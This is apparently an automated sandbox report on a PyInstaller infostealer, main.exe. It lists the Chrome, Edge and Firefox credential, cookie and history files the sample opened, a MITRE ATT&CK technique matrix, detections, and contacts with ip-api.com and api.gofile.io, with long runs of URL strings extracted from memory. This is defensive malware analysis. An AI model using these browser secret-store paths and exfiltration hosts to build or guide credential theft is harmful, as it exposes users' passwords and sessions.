Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\Pythonwin VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\win32 VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\pywin32_system32\pywintypes311.dll VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\win32\win32api.pyd VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\win32com VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\pywin32_system32 VolumeInformation
Source: C:\Users\user\Desktop\main.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI44642\_asyncio.pyd VolumeInformation
Source: C:\Users\user\Desktop\main.exe Code function: 0_2_00007FF6ABA4C5E0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF6ABA4C5E0
Source: C:\Users\user\Desktop\main.exe Code function: 0_2_00007FF6ABA66E70 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF6ABA66E70

Stealing of Sensitive Information

Source: C:\Users\user\Desktop\main.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Bookmarks
Source: C:\Users\user\Desktop\main.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\main.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\local Storage\leveldb
Source: C:\Users\user\Desktop\main.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\main.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\main.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\main.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\main.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\local Storage\leveldb
Source: C:\Users\user\Desktop\main.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\local Storage\leveldb\000003.log
Source: C:\Users\user\Desktop\main.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 21 Windows Management Instrumentation | 1 DLL Side-Loading | 11 Process Injection | 1 Virtualization/Sandbox Evasion | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 1 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 11 Process Injection | LSASS Memory | 31 Security Software Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 1 Native API | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 1 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | 3 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Timestomp | LSA Secrets | 1 System Network Configuration Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 43 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |


Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
Behavior Graph ID: 1579350, Sample: main.exe, Startdate: 21/12/2024, Architecture: WINDOWS, Score: 68

[Behavior graph image not preserved. Recoverable content: main.exe started; signatures "Antivirus / Scanner detection for submitted sample", "Multi AV Scanner detection for submitted file", "AI detected suspicious sample" and "Found pyInstaller with non standard icon". It dropped C:\Users\...\backend_c.cp311-win_amd64.pyd (PE32+), C:\Users\user\...\_cffi.cp311-win_amd64.pyd (PE32+), C:\Users\user\AppData\Local\...\shell.pyd (PE32+) and 88 other files (none is malicious), and started a second main.exe and conhost.exe. The second main.exe, with signature "Tries to harvest and steal browser information (history, passwords, etc)", has DNS/IP nodes ip-api.com (208.95.112.1, 49732, 49733, 80, TUT-ASUS, United States) and api.gofile.io (45.112.123.126, 443, 49731, 49735, AMAZON-02US, Singapore), and started three cmd.exe processes plus 8 other processes, which in turn started WMIC.exe and curl.exe.]

| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| main.exe | 24% | Virustotal | | Browse |
| main.exe | 100% | Avira | OSX/GM.ReverseShe.TH | |

No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ip-api.com | 208.95.112.1 | true | false | | high
api.gofile.io | 45.112.123.126 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://api.gofile.io/servers | false | | high
http://ip-api.com/json/ | false | | high
                                                                                                            https://github.com/jaraco/jaraco.functools/issues/5main.exe, 00000002.00000002.1958092560.000001ED8CB70000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000002.1958768124.000001ED8D150000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://www.accv.es00main.exe, 00000002.00000003.1950643827.000001ED8D400000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904394973.000001ED8D3BC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1959875871.000001ED8D407000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1911117871.000001ED8D3F4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1909336313.000001ED8D3BC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1914422179.000001ED8C7CF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1941809930.000001ED8D3F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pymain.exe, 00000002.00000002.1952635906.000001ED8A3C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.phys.uu.nl/~vgent/calendar/isocalendar.htmmain.exe, 00000002.00000003.1771560505.000001ED8C163000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://www.rfc-editor.org/info/rfc7253main.exe, 00000002.00000003.1930654622.000001ED8D881000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1930910021.000001ED8D881000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904753768.000001ED8D880000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1938394333.000001ED8D882000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904104249.000001ED8D7F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://csrc.nist.gov/publications/nistpubs/800-38C/SP800-38C.pdfmain.exe, 00000002.00000003.1928622951.000001ED8D7F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1930531879.000001ED8D7F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1935934101.000001ED8D81A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1924199076.000001ED8D82E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1907759919.000001ED8D82D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1918350007.000001ED8D7F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1941474977.000001ED8D837000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904104249.000001ED8D7F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1938307594.000001ED8D82F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1932981213.000001ED8D801000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1938854162.000001ED8D832000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.main.exe, 00000002.00000002.1960247806.000001ED8D48D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1926784116.000001ED8D488000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1934949023.000001ED8D48D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://google.com/main.exe, 00000002.00000002.1959196306.000001ED8D301000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904341699.000001ED8D300000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://mahler:8092/site-updates.pymain.exe, 00000002.00000003.1938154397.000001ED8D341000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904341699.000001ED8D300000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1930501212.000001ED8D32C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1940967172.000001ED8D343000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1933446221.000001ED8D340000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1924977485.000001ED8D315000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1946091649.000001ED8D34D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://crl.securetrust.com/SGCA.crlmain.exe, 00000002.00000003.1949579089.000001ED8D6C1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1945704298.000001ED8D6BB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1961554809.000001ED8D6CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://tools.ietf.org/html/rfc5869main.exe, 00000002.00000003.1903709934.000001ED8D360000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1926171009.000001ED8D363000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1916973619.000001ED8D362000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1950516555.000001ED8D368000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1929213253.000001ED8D363000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1959609115.000001ED8D381000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1951003102.000001ED8D37E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://www.python.org/download/releases/2.3/mro/.main.exe, 00000002.00000003.1756603875.000001ED8C09B000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1756807255.000001ED8C0AE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1952715008.000001ED8BBA0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.htmlmain.exe, 00000002.00000003.1926012954.000001ED8D4DC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1938154397.000001ED8D341000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1928622951.000001ED8D7F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1911808962.000001ED8D4EF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1922088597.000001ED8D4F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1930531879.000001ED8D7F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1922088597.000001ED8D4DB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1935934101.000001ED8D81A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1931211381.000001ED8D840000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1930747460.000001ED8D8A6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1962816126.000001ED8D841000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904341699.000001ED8D300000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1929669509.000001ED8D4F2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1926909734.000001ED8D4F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1949750996.000001ED8D343000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904753768.000001ED8D880000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1924199076.000001ED8D82E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1950364654.000001ED8D4E5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 
00000002.00000003.1907759919.000001ED8D82D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1930501212.000001ED8D32C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1940967172.000001ED8D343000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://repository.swisssign.com/WKmain.exe, 00000002.00000003.1949579089.000001ED8D6C1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1945704298.000001ED8D6BB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1961554809.000001ED8D6CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        https://httpbin.org/postmain.exe, 00000002.00000003.1904551547.000001ED8D414000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1930251995.000001ED8D41E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1909336313.000001ED8D414000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_sourcemain.exe, 00000002.00000002.1952715008.000001ED8BBA0000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000003.1754064020.000001ED8C021000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://github.com/Ousret/charset_normalizermain.exe, 00000002.00000003.1926012954.000001ED8D4DC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1922088597.000001ED8D4DB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1948555943.000001ED8D4EC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1928758587.000001ED8D4EB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1927086397.000001ED8D4DC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1909966205.000001ED8D4DB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1911716442.000001ED8D4DB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1930983104.000001ED8D4EC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://www.firmaprofesional.com/cps0main.exe, 00000002.00000003.1903709934.000001ED8D360000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1926171009.000001ED8D363000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904394973.000001ED8D3BC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1916973619.000001ED8D362000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1950516555.000001ED8D368000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1959788649.000001ED8D3E3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1929213253.000001ED8D363000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1909336313.000001ED8D3BC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1938883723.000001ED8D3E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://discord.gg/palletsmain.exe, 00000000.00000003.1725416360.00000237BBB35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://docs.python.org/3/library/re.html#re.submain.exe, 00000002.00000002.1958208064.000001ED8CC80000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000003.1775627654.000001ED8C9B6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1958594536.000001ED8D050000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000003.1775627654.000001ED8C967000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_specmain.exe, 00000002.00000003.1754064020.000001ED8C021000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1952983773.000001ED8BE20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://crl.securetrust.com/SGCA.crl0main.exe, 00000002.00000003.1934949023.000001ED8D484000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_datamain.exe, 00000002.00000003.1922205226.000001ED8A3B9000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1754064020.000001ED8C021000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1908790516.000001ED8A389000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1937965361.000001ED8A3BD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1757862109.000001ED8A3B7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1911158167.000001ED8A3B7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1757279861.000001ED8A3A1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1952635906.000001ED8A3C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://yahoo.com/main.exe, 00000002.00000003.1914711565.000001ED8CB64000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1925966743.000001ED8CB64000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904928536.000001ED8CB4D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1958011767.000001ED8CB64000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1936495508.000001ED8CAC6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904928536.000001ED8CAC6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1957482809.000001ED8CAC6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1906717397.000001ED8CB5C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://crl.securetrust.com/STCA.crl0main.exe, 00000002.00000002.1960197370.000001ED8D47B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://setuptools.pypa.io/en/latest/userguide/declarative_config.html#opt-2main.exe, 00000002.00000002.1958325647.000001ED8CD90000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                https://stackoverflow.com/questions/267399/how-do-you-match-only-valid-roman-numerals-with-a-regularmain.exe, 00000002.00000003.1950132310.000001ED8C1DD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1926306346.000001ED8C905000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1927037674.000001ED8C9A1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904928536.000001ED8C8F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1924390284.000001ED8C1DA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1909775081.000001ED8C8F1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1779284915.000001ED8C94D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1775627654.000001ED8C9B6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1915129551.000001ED8C1DA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1909516582.000001ED8C97F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1779822300.000001ED8C8F1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1910632349.000001ED8C832000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1780531437.000001ED8C93A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1907536669.000001ED8C82C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1924841077.000001ED8C904000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1907334349.000001ED8C1D8000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1775627654.000001ED8C967000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6main.exe, 00000002.00000003.1904928536.000001ED8CAC6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1912333326.000001ED8CB37000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1949238926.000001ED8CB3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://html.spec.whatwg.org/multipage/main.exe, 00000002.00000003.1911242619.000001ED8C19C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1915129551.000001ED8C19E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1910532956.000001ED8C186000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1938242403.000001ED8C1B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://www.quovadisglobal.com/cps0main.exe, 00000002.00000003.1927231579.000001ED8C812000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1956596958.000001ED8C812000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1931812031.000001ED8C812000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1929359605.000001ED8C812000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1913347833.000001ED8C812000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1907536669.000001ED8C812000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://github.com/pyparsing/pyparsing/wikimain.exe, 00000002.00000003.1929359605.000001ED8C7F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crlmain.exe, 00000002.00000003.1924091069.000001ED8D6F1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1914921895.000001ED8D6CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0main.exe, 00000002.00000003.1950643827.000001ED8D400000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904394973.000001ED8D3BC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.1959875871.000001ED8D407000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1911117871.000001ED8D3F4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1909336313.000001ED8D3BC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1941809930.000001ED8D3F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://www.rfc-editor.org/rfc/rfc8259#section-8.1main.exe, 00000002.00000003.1903709934.000001ED8D360000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904394973.000001ED8D38E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1904551547.000001ED8D391000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1935034726.000001ED8D393000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
45.112.123.126 | api.gofile.io | Singapore | 16509 | AMAZON-02US | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579350
Start date and time: 2024-12-21 21:42:11 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 20s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 24
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: main.exe
Detection: MAL
Classification: mal68.spyw.evad.winEXE@37/137@2/2
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 42
• Number of non-executed functions: 71
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 4.175.87.197, 2.16.168.117, 2.16.168.102, 52.165.164.15, 13.107.246.63
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
• Not all processes where analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
